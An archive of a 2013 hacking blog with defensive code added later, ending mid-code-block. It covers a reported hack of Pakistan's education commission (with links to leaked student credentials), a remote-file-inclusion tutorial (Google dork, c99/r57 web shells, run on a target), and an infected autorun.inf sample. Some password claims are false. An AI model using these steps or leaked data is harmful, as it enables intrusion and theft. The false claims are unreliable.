Wednesday, 31 July 2013

OpIslam: Israeli Hackers Hack HEC (Higher Education Commission) of Pakistan Website

The website of the Higher Education Commission of Pakistan was hacked by Israeli hackers, and thousands of email addresses, user names and clear-text passwords for students with 21667 were published online.

The leaked data from the Pakistan Higher Education Commission has been posted to pastebin with an index of links that point to two further files, one clear-text file and one rich-text file, on two different file hosts.

One year ago, Pakistani hackers attacked Israeli cyberspace. That attack was led by 1337, who hacked top Israeli domains, and another attack was led by Hitcher. This shows that this kind of attack on Pakistani cyberspace may turn out very messy for Israeli cyberspace.


"We anti islam
We Love israel <3
We Do Not Forgive
We DO Not Forget
Expect Us
Stop islam
israel is Terrorist

We site http://stz-hacker.noads.biz/

https://www.facebook.com/TheHackersStzNews

Leaked by Hackers sTz
48000 users hec.gov.pk Hacked
text http://www.mediafire.com/?cbb0bip1po8hhi8
text http://www.f2h.co.il/y01jphoxfix1
text rtf http://www.mediafire.com/?zbv4iz1b5g455a1
text rtf http://www.f2h.co.il/8ako95gm9arc"


These attacks on countries' major sites raise many questions for Pakistani security experts and Pakistani hackers.

Tuesday, 30 July 2013

Hack a website using remote file inclusion

Remote file inclusion is one of the most common vulnerabilities found in web applications. This type of vulnerability allows the attacker to add a remote file on the web server. If the attack succeeds, the attacker gains access to the web server and can then execute any command on it.

Searching the Vulnerability

A remote file inclusion vulnerability usually occurs in sites that have navigation similar to the one below

To find the vulnerability, the hacker will most commonly use the following Google Dork
“inurl:index.php?page=”

This will show all the pages which have “index.php?page=” in their URL. Now, to test whether the website is vulnerable to remote file inclusion or not, the hacker uses the following command

So the hacker url will become


If, after executing the command, the Google homepage shows up, then the website is vulnerable to this attack; if it does not come up, then you should look for a new target. In my case, after executing the above command in the address bar, the Google homepage shows up, indicating that the website is vulnerable to this attack.

Now the hacker would upload the shells to gain access. The most common shells used are the c99 shell or the r57 shell. I would use the c99 shell.
The hacker would first upload the shells to a web hosting site such as ripway.com, 110mb.com, etc.

Now here is how a hacker would execute the shells to gain access. Let's say that the URL of the shell is


Now here is how a hacker would execute the following command to gain access


Remember to add “?” at the end of the URL or else the shell will not execute. Now the hacker is inside the website and could do anything with it...
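
From the defender's side, the request pattern described above stands out in web server logs. The following is an added example, not part of the original post: it scans access-log lines for query parameters whose value decodes to an absolute URL, and notes the trailing “?” mentioned above. The log lines, addresses and host names are constructed placeholders.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote

# Constructed sample lines in Apache "combined" log format. Addresses and host
# names are documentation placeholders, not data from the original post.
SAMPLE_LOG = """\
198.51.100.4 - - [30/Jul/2013:10:01:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [30/Jul/2013:10:01:09 +0000] "GET /index.php?page=http://files.example.net/probe.txt? HTTP/1.1" 200 9211 "-" "Mozilla/5.0"
203.0.113.9 - - [30/Jul/2013:10:01:15 +0000] "GET /index.php?page=http%3A%2F%2Ffiles.example.net%2Fprobe.txt%3F HTTP/1.1" 200 9211 "-" "Mozilla/5.0"
203.0.113.9 - - [30/Jul/2013:10:01:21 +0000] "GET /index.php?lang=en&page=hTTp%253A%252F%252Ffiles.example.net/probe.txt HTTP/1.1" 404 312 "-" "Mozilla/5.0"
198.51.100.4 - - [30/Jul/2013:10:02:40 +0000] "GET /index.php?page=contact&ref=newsletter HTTP/1.1" 200 4870 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# A parameter value that is itself an absolute URL is the indicator.
REMOTE_RE = re.compile(r"^\s*(?:https?|ftp)://", re.IGNORECASE)


def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding; bounded so input cannot loop forever."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_rfi_attempts(log_text):
    """Return one finding per query parameter that carries a remote URL."""
    findings = []
    for line in log_text.splitlines():
        match = LINE_RE.match(line)
        if not match:
            continue  # not a request line we understand
        path, _, query = match.group("target").partition("?")
        for name, raw in parse_qsl(query, keep_blank_values=True):
            value = fully_decode(raw)
            if REMOTE_RE.match(value):
                findings.append({
                    "ip": match.group("ip"),
                    "status": int(match.group("status")),
                    "path": path,
                    "param": name,
                    "value": value,
                    # The trailing "?" the post mentions is a strong hint that
                    # the request was crafted rather than accidental.
                    "trailing_query": value.endswith("?"),
                })
    return findings


def by_source(findings):
    """Count findings per client address to prioritise review."""
    return dict(Counter(f["ip"] for f in findings))


if __name__ == "__main__":
    for f in find_rfi_attempts(SAMPLE_LOG):
        print(f["ip"], f["status"], f["path"], f["param"], f["value"])
```

A hit only shows that a request was attempted; whether the application actually fetched the remote file has to be confirmed from the application code or from outbound connection logs.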

Bluejacking Bluetooth+Hijacking

BlueJacking is one of the mostly harmless activities that can happen to any multimedia cell phone. Though it is an unintended and illegal use of a technical feature, most hard-core geeks do not find sufficient technical challenge in the activity. For the more serious hackers and crackers looking to explore the security features of their handset, Bluetooth hacking tools (BlueJacking tools) should be used in a legal and ethical way. Remember one thing: real people own these devices and rely on them for everyday tasks, so please remember to “Do Not Harm”.

Now, What Exactly Is Bluejacking?

Bluetooth hijacking, or BlueJacking, is a technique used to send unsolicited messages over Bluetooth to Bluetooth-enabled devices such as mobile phones, PDAs, laptops or computers, by sending a vCard, which typically contains a message in the name field, to another Bluetooth-enabled device via the OBEX protocol.

As I already said, Bluejacking is usually harmless; however, because BlueJacked people generally don’t know what has happened, they may think that their phone is malfunctioning. A BlueJacker will usually only send a text message, but these days, with modern phones, it is possible to send sounds, clips and images as well. Bluejacking has been used in marketing campaigns to promote advergames and products.


Nowadays, with the increase in the availability of Bluetooth-enabled devices (phones, PDAs, etc.), it is often reported that these devices have become vulnerable to virus, Trojan and malware attacks, and even to complete takeover of devices through a Trojan horse program, although most of these reports are easily debunked. Bluejacking is also confused with Bluesnarfing, which is the way in which mobile phones are illegally hacked via Bluetooth.

Tools For Bluejacking

Many tools have been developed for BlueJacking; most of the development happened from 2008 to 2012, when multiple new Bluetooth vulnerabilities were discovered. There is no specific or official tool, but there are many tools to assist someone in bluejacking; only a few hidden tools are available for the more sinister “BlueSnarfing” or “BlueBugging”. The most commonly used Bluetooth software are “Bloover” and “Easyjack”.
BlueJacking is mainly useful to hackers against devices which do not require authentication, and these days almost all (99%) handsets require authentication before making any connection to another Bluetooth-enabled handset.

Countermeasures

Now that you know how an attack with BlueJacking works, you should also know how to prevent it and what the countermeasures against BlueJacking are. Here are some countermeasures:

1. To prevent BlueJacking, make sure that your device’s Bluetooth is turned off in certain public areas like shopping centers, movie theaters, coffee houses, bars, universities and electronics stores.


2. Set your Bluetooth device to invisible or hidden mode from the main menu. This prevents the sender from seeing your device.

3. Turning your Bluetooth invisible remains a good option when you normally don’t connect with other devices. Enable visibility only when you need to pair your device with another.

4. Ignore BlueJacking messages by refusing or deleting them. Consider BlueJacking the same way you think about spam.

5. Attackers begin BlueJacking by placing a message in the name field of their phone, like “Special Offer” or “wow!! you won this prize, enter 123 to unlock”. Next, they look for enabled devices in the area and select the one they want to BlueJack. They usually send these messages via Bluetooth.

How to become anonymous on Internet and access any block site

Hotspot Shield protects your entire web surfing session, securing your connection at both your home Internet network and public Internet networks (both wired and wireless). Hotspot Shield protects your identity by ensuring that all web transactions (shopping, filling out forms, downloads) are secured through HTTPS. Hotspot Shield also makes you private online, making your identity invisible to third-party websites and ISPs. Unless you choose to sign into a certain site, you will be anonymous for your entire web session with Hotspot Shield. We love the web because of the freedom that it creates to explore, organize, and communicate.
Hotspot Shield enables access to all information online, providing freedom to access all web content freely and securely. Secure your entire web session and ensure your privacy online; your passwords, credit card numbers, and all of your data is secured with Hotspot Shield. Standard antivirus software protects your computer, but not your web activities.
That's why Anchor Free is pleased to offer Hotspot Shield. Our application keeps your Internet connection secure, private, and anonymous.


100% Security Through a VPN


Hotspot Shield creates a virtual private network (VPN) between your laptop or iPhone and our Internet gateway. This impenetrable tunnel prevents snoopers, hackers and ISPs from viewing your web browsing activities, instant messages, downloads, credit card information or anything else you send over the network. The Hotspot Shield security application is free to download, employs the latest VPN technology, and is easy to install and use.

Hotspot Shield runs on:
  • Windows 7
  • Windows XP
  • Windows 2000
  • Windows Vista
  • Mac OS X (10.5 Leopard)
  • Mac OS X (10.6 Snow Leopard)
  • Mac OS X (10.7 Lion)

You will be able to download this software from the given link: DOWNLOAD NOW

NOTE: This tutorial is only for learning purposes and I am not responsible for any type of harm.

Control Mouse Movement by your Hand or Head Gestures with NPointer



If you need to work a lot on the computer (like me) and tend to take small breaks to sit back and lean on the chair, then you must have felt the need for some wireless mouse controller, and this post is worth reading. In case you just wish to have some gesture-controlled mouse controller, this post is also going to interest you.

There are a lot of tools on the market with which you can control your mouse without any direct contact. Some of them use the webcam to recognize your movements and convert the signals into mouse movements. One good tool that does this, and does it well, is called NPointer.



NPointer is an application for gestural computer control in which hand movements are recorded by the webcam connected to your PC and then translated into mouse movements. The application can also decode the usual mouse operations like clicks, double-clicks, drags and scrolls. Disabled people can also use head movements to control the computer.

To get started, you just need to install the tool on your system and then configure it to recognize your hand/head movements. If you plan to use your hands for the mouse control, then place them on the table and keep the webcam straight up. You may wave your hands in the air too, but the table method is better for error-free recognition.



You then need to configure some settings like Motion Speed (how fast the pointer will move compared to the hand movement), Acceleration (how fast the pointer accelerates when hand motion speed changes), Menu timeout (how long the pointer should stay idle before the action menu appears) and Movement cut-off (how fast the hand should move for the movement to be ignored; this is used when you wish to remove your hands without disturbing the pointer position). If you check the Head/Frontal Control box, then you can use your head in place of your hands to control the mouse movements.

You will now see some controls on the screen which can be used to perform the same operations as performed otherwise. The tool is free to use and works well on all versions of Windows. You can read more about it at the link below.


Download NPointer

How Antivirus Software Works

Due to the ever-increasing threat from viruses and other malicious programs, almost every computer today comes with pre-installed antivirus software. In fact, an antivirus has become one of the most essential software packages for every computer.
Even though every one of us has antivirus software installed on our computers, only a few really bother to understand how it actually works! Well, if you are one of those few who would really bother to understand how an antivirus works, then this article is for you.


How Antivirus Works:

Antivirus software typically uses a variety of strategies in detecting and removing viruses, worms and other malware programs. The following are the two most widely employed identification methods:

1. Signature-based detection (Dictionary approach)

This is the most commonly employed method, which involves searching for known patterns of viruses within a given file. Every antivirus program has a dictionary of sample malware codes, called signatures, in its database. Whenever a file is examined, the antivirus refers to the dictionary of sample codes present within its database and compares them with the current file. If a piece of code within the file matches one in its dictionary, then the file is flagged and proper action is taken immediately so as to stop the virus from replicating further. The antivirus may choose to repair the file, quarantine it or delete it permanently, based on its potential risk.
As new viruses and malware are created and released every day, this method of detection cannot defend against new malware unless samples are collected and signatures are released by the antivirus software company. Some companies may also encourage users to upload new viruses or variants so that the virus can be analyzed and the signature can be added to the dictionary.
Signature-based detection can be very effective, but requires frequent updates of the virus signature dictionary. Hence, users must update their antivirus software on a regular basis so as to defend against new threats that are released daily.

2. Heuristic-based detection (Suspicious behaviour approach)

Heuristic-based detection involves identifying suspicious behaviour from any given program which might indicate a potential risk. This approach is used by some of the sophisticated antivirus software to identify new malware and variants of known malware.
Unlike the signature based approach, here the antivirus doesn’t attempt to identify known viruses, but instead monitors the behavior of all programs.
For example, malicious behaviour such as a program trying to write data to an executable program is flagged and the user is alerted about this action. This method of detection gives an additional level of security against unidentified threats.
File emulation: This is another type of heuristic-based approach where a given program is executed in a virtual environment and the actions performed by it are logged. Based on the actions logged, the antivirus software can determine if the program is malicious or not and carry out necessary actions in order to clean the infection.
Most commercial antivirus software uses a combination of both signature-based and heuristic-based approaches to combat malware.
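
The two approaches can be put side by side in a few lines. This is an added sketch, not code from any antivirus product: the signature patterns, the logged actions, the rule weights and the alert threshold are all constructed for the demonstration. It shows a known sample caught by its signature, a re-encoded variant that no longer matches the dictionary, and the same variant caught from its logged behaviour.

```python
# Constructed "signature dictionary": detection name -> byte pattern.
# These patterns are invented markers, not real malware signatures.
SIGNATURES = {
    "Demo.Marker.A": bytes.fromhex("deadbeef4d41524b"),
    "Demo.Marker.B": b"X-DEMO-PAYLOAD-0001",
}

EXECUTABLE_EXT = (".exe", ".dll", ".com", ".scr")

# Heuristic rules: (reason, predicate over one logged action, weight).
# Weights and threshold are assumptions chosen for this example.
RULES = (
    ("writes into an executable file",
     lambda action, target: action == "write"
     and target.lower().endswith(EXECUTABLE_EXT), 5),
    ("creates autorun.inf on a drive root",
     lambda action, target: action == "create"
     and target.lower().endswith("\\autorun.inf"), 3),
    ("deletes a file",
     lambda action, target: action == "delete", 1),
)
ALERT_THRESHOLD = 5


def signature_scan(data):
    """Dictionary approach: report every known pattern found in the file."""
    return sorted(name for name, pattern in SIGNATURES.items() if pattern in data)


def heuristic_scan(events):
    """Behaviour approach: score the actions logged while emulating a program."""
    score, reasons = 0, []
    for action, target in events:
        for reason, predicate, weight in RULES:
            if predicate(action, target):
                score += weight
                if reason not in reasons:
                    reasons.append(reason)
    return score, reasons


def classify(data, events):
    """Combine both methods the way the article describes."""
    names = signature_scan(data)
    if names:
        return "signature", names
    score, reasons = heuristic_scan(events)
    if score >= ALERT_THRESHOLD:
        return "heuristic", reasons
    return "clean", []


# Constructed file contents.
CLEAN = b"MZ" + b"\x00" * 32 + b"ordinary program bytes"
KNOWN = b"MZ" + b"\x00" * 32 + SIGNATURES["Demo.Marker.A"] + b"tail"
# Same sample with its body re-encoded, so the stored pattern is gone.
VARIANT = KNOWN[:34] + bytes(b ^ 0x5A for b in KNOWN[34:])

# Constructed emulation logs: (action, target path).
CLEAN_EVENTS = [("read", "C:\\Users\\demo\\report.txt"),
                ("write", "C:\\Users\\demo\\report.txt")]
VARIANT_EVENTS = [("read", "C:\\WINDOWS\\notepad.exe"),
                  ("write", "C:\\WINDOWS\\notepad.exe"),
                  ("create", "E:\\autorun.inf")]

if __name__ == "__main__":
    print(classify(CLEAN, CLEAN_EVENTS))
    print(classify(KNOWN, []))
    print(classify(VARIANT, VARIANT_EVENTS))
```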

Issues of Concern:

Zero-day threats: A zero-day (zero-hour) threat or attack is one where malware tries to exploit computer application vulnerabilities that are as yet unidentified by the antivirus software companies. These attacks are used to cause damage to the computer even before they are identified. Since patches are not yet released for these kinds of new threats, they can easily manage to bypass the antivirus software and carry out malicious actions. However, most threats are identified a day or two after their release, but the damage caused by them before identification is quite inevitable.
Daily Updates: Since new viruses and threats are released every day, it is most essential to update the antivirus software so that the virus definitions are kept up-to-date. Most software will have an auto-update feature so that, the virus definitions are updated whenever the computer is connected to the Internet.
Effectiveness: Even though antivirus software can catch almost every piece of malware, it is still not 100% foolproof against all kinds of threats. As explained earlier, a zero-day threat can easily bypass the protective shield of the antivirus software. Also, virus authors have tried to stay a step ahead by writing “oligomorphic”, “polymorphic” and, more recently, “metamorphic” virus codes, which encrypt parts of themselves or otherwise modify themselves as a method of disguise, so as to not match virus signatures in the dictionary.
Thus user awareness is as important as antivirus software; users must be trained to practice safe surfing habits such as downloading files only from trusted websites and not blindly executing a program that is unknown or obtained from an untrusted source. I hope this article will help you understand the working of an antivirus software.

Chat with Friends through MS-DOS Command Prompt

1) All you need is your friend's IP Address and your Command Prompt.

2) Open Notepad and type this code exactly as it is:

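@echo off
REM Asks for a target and a message, sends it with "net send", then repeats.
REM "net send" relies on the Messenger service (Windows 2000/XP).
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A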


3) Now save this as "Messenger.Bat".


4) Open Command Prompt.


5) Drag this file (.bat file) over to Command Prompt and press Enter.


6) Now, type the IP address of the computer you want to contact and press Enter.


7) Now all you need to do is type your message and press Enter. Start chatting!


Basic of Password Cracking for Beginner

Password cracking is the process of recovering secret passwords from data that has been stored in or transmitted by a computer system. A common approach is to repeatedly try guesses for the password.


Most passwords can be cracked by using the following techniques:
1) Hashing :- 

Here we will refer to the one way function (which may be either an encryption function or cryptographic hash) employed as a hash and its output as a hashed password.
If a system uses a reversible function to obscure stored passwords, exploiting that weakness can recover even 'well-chosen' passwords.
One example is the LM hash that Microsoft Windows uses by default to store user passwords that are less than 15 characters in length.
LM hash breaks the password into two 7-character fields which are then hashed separately, allowing each half to be attacked separately.

Hash functions like SHA-512, SHA-1, and MD5 are considered impossible to invert when used correctly.


2) Guessing :- 


Many passwords can be guessed either by humans or by sophisticated cracking programs armed with dictionaries (dictionary based) and the user's personal information.

Not surprisingly, many users choose weak passwords, usually one related to themselves in some way. Repeated research over some 40 years has demonstrated that around 40% of user-chosen passwords are readily guessable by programs. Examples of insecure choices include:

* blank (none)
* the word "password", "passcode", "admin" and their derivatives
* the user's name or login name
* the name of their significant other or another person (loved one)
* their birthplace or date of birth
* a pet's name
* a dictionary word in any language
* automobile licence plate number
* a row of letters from a standard keyboard layout (eg, the qwerty keyboard -- qwerty itself, asdf, or qwertyuiop)
* a simple modification of one of the preceding, such as suffixing a digit or reversing the order of the letters.
and so on....

In one survey of MySpace passwords which had been phished, 3.8 percent of passwords were a single word found in a dictionary, and another 12 percent were a word plus a final digit; two-thirds of the time that digit was.
A password containing both uppercase and lowercase characters, numbers and special characters is a strong password and can never be guessed.
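
The list of insecure choices above translates directly into a check that can be run when a password is set. The following is an added example, not code from the original post; the tiny word list, the character substitutions and the sample login and personal details are constructed, and a real deployment would load a full dictionary file.

```python
KEYBOARD_ROWS = ("1234567890", "qwertyuiop", "asdfghjkl", "zxcvbnm")
COMMON = ("password", "passcode", "admin")
# Tiny constructed stand-in for a real dictionary file.
SAMPLE_DICTIONARY = frozenset({"dragon", "monkey", "sunshine", "football", "welcome"})
# Common look-alike substitutions ("derivatives" of a word).
LEET = str.maketrans({"0": "o", "1": "i", "3": "e", "4": "a",
                      "5": "s", "7": "t", "@": "a", "$": "s"})
TRAILING = "0123456789!@#$%*?."


def variants(password):
    """Undo the 'simple modifications' from the list: suffixes, reversal, look-alikes."""
    base = password.lower()
    forms = {base, base.rstrip(TRAILING)}          # suffixed digits/symbols
    forms |= {form[::-1] for form in forms}        # reversed letter order
    forms |= {form.translate(LEET) for form in forms}
    forms.discard("")
    return forms


def weak_reasons(password, login="", personal=(), dictionary=SAMPLE_DICTIONARY):
    """Return the reasons a password is guessable; an empty list means none found.

    `personal` holds strings an attacker could learn about the user: names,
    birthplace, date of birth, pet's name, licence plate.
    """
    if not password.strip():
        return ["blank"]
    forms = variants(password)
    reasons = []
    if any(word in form for form in forms for word in COMMON):
        reasons.append("common word or derivative")
    terms = [t.lower() for t in (login, *personal) if t]
    if any(form == t or (len(t) >= 4 and t in form) for form in forms for t in terms):
        reasons.append("personal information")
    if any(form in dictionary for form in forms):
        reasons.append("dictionary word")
    if any(len(form) >= 4 and form in row for form in forms for row in KEYBOARD_ROWS):
        reasons.append("keyboard row")
    return reasons


if __name__ == "__main__":
    # Constructed user details and candidate passwords.
    details = ("Rex", "Lahore", "14081990")
    for candidate in ("", "Passw0rd1!", "nogard7", "asdf", "Rex2009", "t7#Kq!v2Lm$x"):
        print(repr(candidate), weak_reasons(candidate, login="asmith", personal=details))
```

`Passw0rd1!` mixes upper and lower case, digits and a symbol, yet is reported as a derivative of "password": the check looks at how the password was built, not only at which character classes it contains.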

Check Your Password Strength

3) Default Passwords :- 


A moderately high number of local and online applications have inbuilt default passwords that have been configured by programmers during development stages of software. There are lots of applications running on the internet on which default passwords are enabled. So, it is quite easy for an attacker to enter default password and gain access to sensitive information. A list containing default passwords of some of the most popular applications is available on the internet.
Always disable or change the applications' (both online and offline) default username-password pairs.

4) Brute Force :- 


If all other techniques fail, then attackers use the brute-force password cracking technique. Here an automatic tool is used which tries all possible combinations of the keys available on the keyboard. As soon as the correct password is reached, it is displayed on the screen. This technique takes an extremely long time to complete, but the password will surely be cracked.
The longer the password, the longer the time taken to brute force it.

5) Phishing :- 


This is the most effective and easily executable password cracking technique which is generally used to crack the passwords of e-mail accounts, and all those accounts where secret information or sensitive personal information is stored by user such as social networking websites, matrimonial websites, etc.
Phishing is a technique in which the attacker creates a fake login screen and sends it to the victim, hoping that the victim gets fooled into entering the account username and password. As soon as the victim clicks on the "enter" or "login" button, this information reaches the attacker using scripts or online form processors, while the user (victim) is redirected to the home page of the e-mail service provider.


Never reply to messages that demand your username and password while claiming to be from your e-mail service provider.

It is possible to try to obtain the passwords through other different methods, such as social engineering, wiretapping, keystroke logging, login spoofing, dumpster diving, phishing, shoulder surfing, timing attack, acoustic cryptanalysis, using a Trojan Horse or virus, identity management system attacks (such as abuse of Self-service password reset) and compromising host security.
However, cracking usually designates a guessing attack.

Repairing Windows XP in Eight Commands

Windows could not start because the following file is missing or corrupt:

\WINDOWS\SYSTEM32\CONFIG\SYSTEM

You can attempt to repair this file by starting Windows Setup
using the original Setup CD-ROM.

Select ‘R’ at the first screen to start repair.

Which renders your PC inaccessible from the standard boot procedures of Windows XP. You try safe mode, to no avail. You’re particularly savvy and try issuing the FIXBOOT and FIXMBR commands in the Windows recovery console, but after each reboot, you’re merely greeted with the same obnoxious and terrifying blue screen of death that’s preventing you from accessing your precious data.

Perhaps you’ve also seen these error screens:

Windows NT could not start because the below file is missing or corrupt:

X:\WINNT\System32\Ntoskrnl.exe
_________________

Windows NT could not start because the below file is missing or corrupt:

X:\WINNT\System32\HAL.dll
_________________

NTLDR is Missing
Press any key to restart
_________________

Invalid boot.ini
Press any key to restart



Allow me to build tension by prefacing the end-all/be-all solution with my background: Having worked for the now-incorporated Geek Squad branch of Best Buy Corporation for the better part of eight months, I have seen dozens upon dozens of systems come through our department with any one of these errors, brought in by customers who are afraid they did something, have a virus, or are in jeopardy of losing their data. Prior to my discovery of an invaluable sequence of commands, our standard procedure was to hook the afflicted drive to an external enclosure, back up a customer’s data and then restore the PC with the customer’s restore discs or an identical copy of Windows with the customer’s OEM license key. If the customer wasn’t keen on the applicable charges for the data backup, we informed them of the potential risks for a Windows repair installation (Let’s face it, they don’t always work right), had them sign a waiver, and we did our best.

Neither of these procedures is cheap in the realm of commercial PC repair, nor do they inspire a tremendous level of confidence in the technician or the hopeful client.

In an effort to expedite our repair time and retain the sanity of myself and other technicians, I received permission to undertake a case study on a variety of PCs currently in service that exhibited any of the aforementioned symptoms, and I took it upon myself to find a better solution. After crawling through the MSKB, Experts Exchange, MSDN and sundry websites all extolling the virtues of a solution to these problems, I only found one that worked, and it has been reliably serving me for the better part of two weeks on seventeen PCs to date. The process is simple: Get to the Windows Recovery Console for your particular Windows installation, navigate to the root letter of your installation (C: in most cases), issue eight commands, and reboot. The cornerstone of this process is a command called “BOOTCFG /Rebuild” which is a complete diagnostic of the operating system loaded into the recovery console; the purpose of the command is to remove/replace/repair any system files that were preventing the operating system from loading correctly. Amongst the files it fixes are:

Windows Hardware Abstraction Layer (HAL)
Corrupt registry hives (\WINDOWS\SYSTEM32\CONFIG\xxxxxx)
Invalid BOOT.INI files
A corrupt NTOSKRNL.EXE
A missing NT Loader (NTLDR)
The command process may apply to other types of blue screens or Hive/HAL/INI/EXE/DLL-related stop errors, but I have not had the luxury of computers in this type of disrepair. The process I am about to outline is virtually harmless, and if you feel you may be able to correct your PC’s boot-time blue screens and stop errors with the sequence, feel free to try. Let us now begin with a step-by-step instruction for correcting these issues.

GETTING TO THE WINDOWS RECOVERY CONSOLE
Insert your Windows XP CD into your CD-ROM drive and ensure that the drive is capable of booting the CD. Configuring your computer to boot from CD is outside of the scope of this document, but if you are having trouble, consult Google for assistance.
Once you have booted from CD, do not select the option that states: “Press F2 to initiate the Automated System Recovery (ASR) tool.” You’re going to proceed until you see the following screen, at which point you will press the “R” key to enter the recovery console:

After you have selected the appropriate option from step two, you will be prompted to select a valid Windows installation (typically number “1”). Select the installation number (as mentioned, “1” in most cases), and hit enter. If there is an administrator password for the administrator account, enter it and hit enter. You will be greeted with this screen, which indicates a recovery console at the ready:

PROCEEDING WITH THE REPAIR FUNCTIONS
There are eight commands you must enter in sequence to repair any of the issues I noted in the opening of this guide. I will introduce them here, and then show the results graphically in the next six steps. These commands are as follows:
CD ..
ATTRIB -H C:\boot.ini
ATTRIB -S C:\boot.ini
ATTRIB -R C:\boot.ini
DEL boot.ini
BOOTCFG /Rebuild
CHKDSK /R /F
FIXBOOT
To “Go up a directory” in computing is to revert back to the directory above the current folder you’re operating in. If, for example, I’m in the C:\WINDOWS\SYSTEM32 directory, and I want to get at a file in the WINDOWS directory, I would merely type CD .. and I would be taken out of the SYSTEM32 folder and up one level to WINDOWS. We’re going to do the same thing here from the WINDOWS folder to get to the basic root of C:

Now that we are at C: we can begin the process of repairing the operating system, and that begins with modifying the attributes of the BOOT.INI file. Briefly, BOOT.INI controls what operating systems the Windows boot process can see, how to load them, and where they’re located on your disk. We’re going to make sure the file is no longer hidden from our prying eyes, remove the flag that sets it as an undeletable system file, and remove the flag that sets it as a file we can only read, but not write to. To do this, we will issue three commands in this step:

ATTRIB -H C:\BOOT.INI
ATTRIB -R C:\BOOT.INI
ATTRIB -S C:\BOOT.INI
to remove the Hidden, Read Only and System flags.

Now that we’ve modified the attributes for the BOOT.INI file, it’s up for deletion. The syntax for it is simple: { DEL | FILE NAME }, e.g., DEL BOOT.INI deletes the BOOT.INI file.

Now for the most important step of our process, the BOOTCFG /REBUILD command which searches for pre-existing installations of Windows XP and rebuilds sundry essential components of the Windows operating system, recompiles the BOOT.INI file and corrects a litany of common Windows errors. It is very important that you do one or both of the following two things: First, every Windows XP owner must use /FASTDETECT as an OS Load Option when the rebuild process is finalizing. Secondly, if you are the owner of a CPU featuring Intel’s XD or AMD’s NX buffer overflow protection, you must also use /NOEXECUTE=OPTIN as an OS Load Option. I will demonstrate both commands for the purpose of this guide, but do not set NOEXECUTE as a load option if you do not own one of these CPUs. For the “Enter Load Identifier” portion of this command, you should enter the name of the operating system you have installed. If, for example, you are using Windows XP Home, you could type “Microsoft Windows XP Home Edition” for the identifier. This gives the process some authenticity, if you’re keen on being a perfectionist.

This step verifies the integrity of the hard drive containing the Windows XP installation. While this step is not an essential function in our process, it’s still good to be sure that the drive is physically capable of running Windows, in that it contains no bad sectors or other corruptions that might be the culprit. No screenshot necessary here! Just type CHKDSK /R /F at the C:\> prompt. Let it proceed; it could take in excess of 30 minutes on slower computers. When this is finished, move on to the seventh and final step.

This last step also requires no screenshot. When you are at the C:\> prompt, simply type FIXBOOT. This writes a new boot sector to the hard drive and cleans up all the loose ends we created by rebuilding the BOOT.INI file and the system files. When the Windows Recovery Console asks you if you are “Sure you want to write a new bootsector to the partition C: ?” just hit “Y,” then enter to confirm your decision.

RESULTS AND WRAP-UP
It’s time to reboot your PC by typing EXIT in the Windows Recovery Console and confirming the command with a stroke of the enter key. With any luck, your PC will boot successfully into Windows XP as if your various DLL, Hive, EXE and NTLDR errors never existed. You’ve just saved yourself from many hours of work, frustration, potential data loss and shelling out your hard-earned greenbacks at a brick’n'mortar operation.

Autorun.inf attack? Read this to learn what happens with the inf file

Autorun.inf virus attack! Is autorun.inf virus?

These are the instructions saved in an infected autorun.inf file (one that calls virus programs):

[Autorun] 
Open=RECYCLER\QqFvXcB.exe 
Explore=RECYCLER\QqFvXcB.exe 
AutoPlay=RECYCLER\QqFvXcB.exe 
shell\Open\Command=RECYCLER\QqFvXcB.exe 
shell\Open\Default=1 
shell\Explore\command=RECYCLER\QqFvXcB.exe 
shell\Autoplay\Command=RECYCLER\QqFvXcB.exe

Introduction to Autorun.inf File:
Autorun.inf is a file that triggers other programs, documents or other files to be opened when a CD or pen drive is inserted. It simply triggers them.

When a CD or pen drive is inserted, Windows searches for the autorun.inf file and follows the instructions written inside it.

How to create Autorun file?
Open notepad

type this command:

[Autorun]

Save the file as "autorun.inf" (select "All Files" as the file type, not "Text").

Complete Syntax and instructions inside the Autorun file:
The basic syntax that must be inside the autorun.inf file is:

[Autorun]

This is used to identify the file as an autorun file.

OPEN=

This specifies which application should be opened when the CD or pen drive is opened.

Example:

open=virus.exe

This will launch the virus.exe file when the CD or pen drive is opened. The file should be in the root directory.

If the file is in a subdirectory, then we have to specify it.

Open=RECYCLER\Virus.exe

Explore=

There is no big difference. If you right-click the CD or pen drive and select the Explore option, this command will be run.

AutoPlay=

Same as the above, but it will launch the program when the drive is auto-played.

SHELL\VERB =

The SHELL\VERB command adds a custom command to the drive's shortcut menu. This custom command can for example be used to launch an application on the CD/DVD.

Example:

    shell\Open\Command=RECYCLER\QqFvXcB.exe
    shell\Open\Default=1
    shell\Explore\command=RECYCLER\QqFvXcB.exe
    shell\Autoplay\Command=RECYCLER\QqFvXcB.exe

Use a series of shell commands to specify one or more entries in the pop-up menu that appears when the user right-clicks on the CD icon. (The shell entries supplement the open command.)

Icon=

Changes the icon of your pen drive or CD. You can use .ico and .bmp images (also .exe and .dll files).

Example:

icon=hackingtalent.ico

Label=

Specifies a text label to be displayed for this CD in Explorer.

Note that using the LABEL option can lead to problems displaying the selected ICON under Windows XP.

Example:

Label=Ethical hacking

Why Antivirus Block Autorun.inf file?
From the above, you now know that the autorun.inf file itself is not a virus. So why does antivirus software block it? Because, as I said, an autorun file can call or launch any application or exe file, which can lead to a virus attack. If autorun.inf is blocked, then there is no way to launch the virus code.

Autorun.inf is not a virus, but it can call virus files.
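
To triage removable media, the syntax described above can be parsed and checked for the pattern seen in the infected file: launch entries pointing into a folder that is normally hidden. The following is an added example, not code from the original post. The first sample is the infected file quoted above and the second is a constructed benign disc; the list of hidden folder names and the `shellexecute` key (a documented autorun.inf key not mentioned in the post) are assumptions of this example.

```python
import re

# The infected file quoted in the post, and a constructed benign installer disc.
INFECTED = r"""[Autorun]
Open=RECYCLER\QqFvXcB.exe
Explore=RECYCLER\QqFvXcB.exe
AutoPlay=RECYCLER\QqFvXcB.exe
shell\Open\Command=RECYCLER\QqFvXcB.exe
shell\Open\Default=1
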